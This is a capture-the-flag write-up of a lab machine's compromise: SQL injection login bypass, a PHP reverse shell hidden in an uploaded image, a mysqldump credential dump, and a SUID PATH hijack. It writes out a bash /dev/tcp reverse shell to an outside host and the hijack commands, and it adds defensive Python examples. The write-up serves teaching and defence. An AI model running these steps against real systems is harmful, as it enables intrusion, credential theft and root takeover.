0. Preface

The SQL injection took me the longest to get past because I didn’t notice that Burp Suite returned a ‘302 Found’; I was expecting the page to redirect automatically. Otherwise, this box is a pretty straightforward one.

In this box, we will be tackling:

  1. SQL injection to bypass the login
  2. Uploading “images” to get a reverse shell
  3. Using mysqldump to dump databases
  4. Exploiting the $PATH variable

1. Preliminary NMAP Scan

sudo nmap -sC -sV -O -oN nmap.txt 10.10.10.185 -p- -v

This is a Linux box running Ubuntu. There is also a web server listening on port 80.

2. Taking a Look at the Website

Doesn’t seem like much here, let’s see what the login link on the bottom left looks like.

The login page seems to be running on PHP.

3. Gobuster Scan

Let’s run Gobuster to find out what other directories/.php files we can find.

gobuster dir -u http://10.10.10.185 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

Nothing much jumps out from the gobuster scan except for upload.php. When accessed directly, the page redirects back to the login page.

So let’s go back to see what we can do with the login page.

4. SQL Injection

Let’s get Burp Suite going and try SQL injection. Intercept the login request and send it to Repeater with Ctrl+R.

First, let’s try sending a normal request with a random username and password.

Notice that an alert gets thrown: “Wrong Username or Password”.

Add a single quote to the username and the alert disappears, which suggests the quote is breaking the query:

Let’s try more stuff:

Notice that the response status is now 302 Found instead of 200 OK? That most likely means we got something: the server is redirecting us as it would after a successful login.

Let’s try accessing the upload.php page again. We’re in:

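The bug class behind this bypass is a login query built by string concatenation, so the user-supplied quote becomes SQL syntax. The example below is added here and is not code from the box or from the writeup’s author: it runs the concatenated lookup and a parameterised one side by side against a constructed in-memory SQLite table. The table name, columns and the sample account are invented for the example, and the injected input is the textbook tautology, not necessarily the payload used on the box.

```python
import hmac
import sqlite3


def make_db():
    """Constructed sample table with one account (not the box's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'correct-horse')")
    return conn


def login_vulnerable(conn, username, password):
    """Concatenated query: the input is spliced into the SQL text, so a
    quote ends the string literal and anything after it is parsed as SQL.
    This is the pattern the writeup's login bypass relies on."""
    sql = ("SELECT username FROM login WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        # A lone quote produces a syntax error. The app in the writeup
        # reacted to this by silently dropping its 'Wrong Username' alert,
        # which is the tell-tale the author spotted.
        return None
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Parameterised query: the driver sends the value out of band, so
    quotes and OR clauses in the input are compared as literal text.
    The password is checked in constant time; a real app would store and
    compare a salted hash rather than the plaintext used here."""
    sql = "SELECT username, password FROM login WHERE username = ?"
    row = conn.execute(sql, (username,)).fetchone()
    if row is None:
        return None
    if hmac.compare_digest(row[1].encode(), password.encode()):
        return row[0]
    return None
```

Run `login_vulnerable` and `login_hardened` with the same tautology input: the first returns the admin row because the condition collapses to `username = 'admin' OR (...)`, the second returns nothing because no account is literally named `admin' OR '1'='1`.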

5. Trying To Upload Something Malicious

Let’s try uploading a text file.

The text file is rejected, so let’s try uploading an image file and then adding a PHP reverse shell to its body using Burp.

The PHP reverse shell by pentestmonkey can be obtained here.

Don’t forget to change the LHOST IP address and LPORT number before sending it over.

And we have successfully uploaded it.

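The upload handler accepted a file named 5.php.jpeg because its check was satisfied by an image-looking name and header, while the web server still treated the inner .php extension as executable. The validator below is an added example, not the box’s code: it shows the checks a hardened handler would run (directory part stripped, extension allow-list, no double extensions, size cap, magic bytes matching the extension) and then discards the client’s filename entirely. The allow-list, size limit and sample bytes are constructed for the example.

```python
import os
import secrets

# Allow-list of extension -> leading magic bytes (constructed for this example).
ALLOWED_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024


def validate_upload(filename, data):
    """Return (accepted, reason). Checks run in order, so the reason names
    the first control that fired."""
    base = os.path.basename(filename)  # drop any directory part the client sent
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    # A second extension hidden in the stem ('5.php.jpeg') is exactly what
    # let the server run the upload as PHP; refuse it outright.
    if "." in stem or stem == "":
        return False, "multiple extensions"
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "too large"
    # Magic bytes must match the claimed type. This alone does not stop a
    # polyglot (valid JPEG header followed by PHP), which is why the rename
    # below and a no-execute upload directory are the decisive controls.
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, "ok"


def stored_name(filename):
    """Never keep the client-supplied name: random stem plus the validated,
    lower-cased extension, so no '.php' can survive into the stored path."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return secrets.token_hex(16) + ext
```

Call `validate_upload` first and only pass accepted files to `stored_name`; the stored path should live in a directory the web server is configured not to execute scripts from, so that even a polyglot image is served as bytes rather than run.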

6. PHP Reverse Shell

Let’s set up a netcat listener on port 8000 to catch the reverse shell.

nc -lvnp 8000

Next, we request the uploaded file in a web browser at http://10.10.10.185/images/uploads/5.php.jpeg to trigger the reverse shell.

There we go, we caught the reverse shell, and we are logged in as www-data:

Let’s upgrade it to a fully interactive shell using Python.

On the remote machine, run:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
export SHELL=/bin/bash

Next, background the reverse shell with Ctrl+Z, then run the following on the attacker machine:

stty raw -echo;fg
reset

7. Enumeration

Let’s take a look at the /var/www/ folder to see what we can find.

Let’s take a look at db.php5. It contains a username and a password:

Let’s see if theseus actually exists in the /etc/passwd file.

And yes, it does. Also note that a mysql account exists, which means MySQL is most likely installed on the box.

Let’s try su theseus first with the password we got:

No luck there. Next, let’s see if theseus can access MySQL.

Weirdly, the mysql client binary is not found on this system. Let’s see what other MySQL binaries we can make use of:

find / -name 'mysql*' -type f -perm 755 2>/dev/null

Notice that mysqldump is installed. We can use that to dump the Magic database by running:

mysqldump -u theseus -p --databases Magic

And we have another set of credentials in the login table:

8. Privilege Escalation

Let’s try to su to theseus with the new password we found.

Success. Let’s first grab the user flag.

Next, let’s upload and run linpeas.sh to see if there’s anything we can exploit. This will take a while.

After linpeas.sh has finished, we can see that there’s a binary called sysinfo owned by root that has the SUID bit set:

This means the binary runs with root privileges even though we are logged in as theseus. Let’s see if we can exploit it.

We can roughly try to see what this binary does by running:

strings /bin/sysinfo

It seems this binary outputs system information by calling other programs, and it looks them up by name rather than by absolute path. We can intercept that by creating a symbolic link to /bin/bash named after any of the programs it runs. Let’s use fdisk for this.

First, create a directory in /tmp/ and, inside it, create a symbolic link named fdisk pointing to /bin/bash:

ln -s /bin/bash fdisk

Next, prepend the /tmp/ directory we created to the $PATH environment variable so that our fdisk is found before the one located in /bin:

PATH=/tmp/dir:$PATH

To test this, run which fdisk to see which copy of the binary is found first. In this case, it is the one in the /tmp/ directory.

Now run sysinfo and we get a root shell.

However, the shell doesn’t seem to output anything.

Since the shell is attached to sysinfo’s output handling rather than our terminal, let’s execute a bash reverse shell from the “half” shell by running:

bash -c 'bash -i >& /dev/tcp/10.10.14.43/8888 0>&1'

And there we go. We got root.
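The root cause here is a SUID program that trusts the caller’s PATH when it spawns helpers. The example below is added here and is not the box’s sysinfo or any code from the writeup: it shows the audit check a defender or a linpeas-style script would run over a PATH value, a re-implementation of the lookup that which fdisk reports so the hijack can be reasoned about on a constructed filesystem, and the way a hardened privileged program should spawn a helper (absolute path from an allow-list, environment it controls). The trusted directory list and the /sbin/fdisk path are assumptions for the example; only fdisk is named on the page.

```python
import os
import subprocess

# PATH a privileged program should impose regardless of the caller's
# environment. The directory list is an assumption for this example.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"
TRUSTED_DIRS = frozenset(SAFE_PATH.split(":"))

# Helpers a hardened sysinfo-style program may call, by absolute path.
# Only fdisk is mentioned in the writeup; /sbin/fdisk is an assumed location.
HELPER_ALLOWLIST = {"fdisk": ["/sbin/fdisk", "-l"]}


def untrusted_path_entries(path_value):
    """Audit a PATH string and return the entries a SUID program must not
    honour: empty entries and '.' (both mean the current directory) and any
    directory outside TRUSTED_DIRS, such as the /tmp/dir prepended above."""
    bad = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            bad.append(entry or "<empty>")
        elif os.path.normpath(entry) not in TRUSTED_DIRS:
            bad.append(entry)
    return bad


def resolve_like_which(name, path_value, exists):
    """Mimic the lookup that `which` reports: the first PATH entry that
    contains `name` wins. `exists` is injected so the caller can supply a
    constructed filesystem instead of touching the real one."""
    for entry in path_value.split(":"):
        candidate = os.path.join(entry or ".", name)
        if exists(candidate):
            return candidate
    return None


def privileged_helper_command(tool):
    """Build argv and env the way a hardened SUID program should: an
    absolute path taken from the allow-list, and an environment the program
    constructs itself rather than inheriting from the caller."""
    if tool not in HELPER_ALLOWLIST:
        raise ValueError("helper not on allow-list: %s" % tool)
    env = {"PATH": SAFE_PATH, "LANG": "C"}
    return list(HELPER_ALLOWLIST[tool]), env


def run_helper(tool):
    """Execute the helper with the controlled argv and env (not exercised
    by the test, since it would run the real binary)."""
    argv, env = privileged_helper_command(tool)
    return subprocess.run(argv, env=env, capture_output=True, text=True).stdout
```

With a constructed filesystem containing both /tmp/dir/fdisk and /sbin/fdisk, `resolve_like_which` returns the /tmp copy for the hijacked PATH and the /sbin copy for SAFE_PATH, which is the whole difference between the vulnerable binary and the hardened one; `untrusted_path_entries` is the check that flags the hijacked PATH in the first place.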